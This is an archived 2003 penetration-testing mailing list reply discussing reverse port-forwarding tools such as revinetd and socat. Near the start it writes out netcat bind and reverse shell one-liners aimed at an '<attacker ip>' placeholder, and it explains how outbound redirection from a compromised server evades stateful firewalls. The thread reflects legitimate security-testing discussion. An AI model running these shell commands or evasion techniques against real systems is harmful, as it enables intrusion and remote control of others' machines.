Yes, you can use netcat to send a shell back, but it is a pain to use it for port redirection. E.G. for a shell you can: nc -l -p <port> -e /bin/sh or nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235 and have stdin and stdout connected to the above ports respectively. But we want to use more robust services other than shell, such as getting GUI on Windows via terminal services or other more complex protocols. Lets take for example a service on a machine that is not nat'd but a border server we can compromise has access to it. You can use rinetd, fpipe, stunnel, etc for forward redirection. In these cases, there needs to be 2 holes punched through on the server, 1 for the shell used to compromised the server (like www or telnet) and then the port for the redirector to listen on. Revinetd is used for port redirection where the server appears to be the initiator of the connectivity. You theoretically only need one port open in the forward direction which is the shell. All other connectivity is intiated outbound from the server, so a stateful firewall would see the port redirector traffic as NEW in the connection table from the server, allowing us to utilize more liberal rule sets that we know most organizations allow. Now I know revinetd is not the only thing to use for it. It was brought to my attention that socat can be used for this, but I wanted a tool that was just used for reverse port forwarding and was intuitive to use. I hope this answers your question. Steve >From: "Filip Maertens" <filipat_private> >To: "'Steven Gill'" <gman1120at_private>,<pen-testat_private> >Subject: RE: command-line reverse connection tunnel? >Date: Sat, 15 Mar 2003 23:57:32 +0100 > > >have successfully tested it in a pen test stituation in the lab for >doing > >reverse connectivity. I think this would be a valuable tool for all >people > >I beg to differ. > >What exactly is different from using netcat listeners on both, >attack-client and target machine? All in all, using a reverse telnet >technique using netcat isn't very much a big an issue? I think this is >a handy tool, but I would like to emphasize one can also use netcat in >doing so (if this had been mentioned before in the "old posts", >disregard this post, since I didn't followed this thread). > > >Fil > >-- >Filip Maertens @ Home >http://www.compsec.be > > >---------------------------------------------------------------------------- >Did you know that you have VNC running on your network? >Your hacker does. Plug your security holes now! >Download a free 15-day trial of VAM: >http://www2.stillsecure.com/download/sf_vuln_list.html _________________________________________________________________ MSN 8 helps eliminate e-mail viruses. Get 2 months FREE*. http://join.msn.com/?page=features/virus ---------------------------------------------------------------------------- Did you know that you have VNC running on your network? Your hacker does. Plug your security holes now! Download a free 15-day trial of VAM: http://www2.stillsecure.com/download/sf_vuln_list.html
This archive was generated by hypermail 2b30 : Mon Mar 17 2003 - 08:31:53 PST